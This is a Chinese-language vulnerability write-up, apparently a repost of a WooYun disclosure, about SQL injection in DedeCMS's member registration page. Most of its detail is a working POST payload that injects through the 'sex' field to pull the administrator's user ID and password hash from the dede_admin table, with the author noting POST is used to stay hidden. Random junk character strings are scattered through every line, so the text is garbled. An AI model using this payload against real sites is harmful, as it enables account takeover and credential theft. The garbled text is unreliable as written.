漏洞类型: SQL注射漏洞# a' s c5 R, w1 S7 ?
简要描述:
' [7 a% \, M, h" u* g3 z5 C8 H, f
) A4 ?) U3 @* P! V需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
, ^( D+ ~3 H5 {8 ^原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ ~% o! K! B6 `/ P* o7 }+ J! z4 K
详细说明:跟这个漏洞/ Q# Z" Z$ r/ |0 T4 v, d, t% s
5 e( E- f4 @# Z& W- |9 v" M \WooYun: Dedecms SQL注射导致审核机制绕过漏洞
% D% a2 b2 ~" \# `4 r是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.6 @) E0 Q, a0 \8 m# a
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
- Q6 @5 p- o+ k- ^6 v/ D
: g5 I3 f7 @. X3 I# E8 a. bwww.political-security.com/member/reg_new.php
- k2 B" _6 y* d3 s8 \# U7 M ; d0 ~ A2 `! j/ g; ]. f
POST
* |( O4 _9 w) `) Y
" J' X0 t" E! I! q& pdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&& a: }' ~$ e9 {
userid=c4rp3nt3r&uname=c4rp3nt3r
2 L q. H. x' b+ S# T) L) G& M&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 U/ J- x( j" ~
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,: c! K; l4 G& m3 z8 U8 t
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
& U+ L; v, w5 H# s. I2 c8 Z; T5 {%00&vdcode=glos&agree= |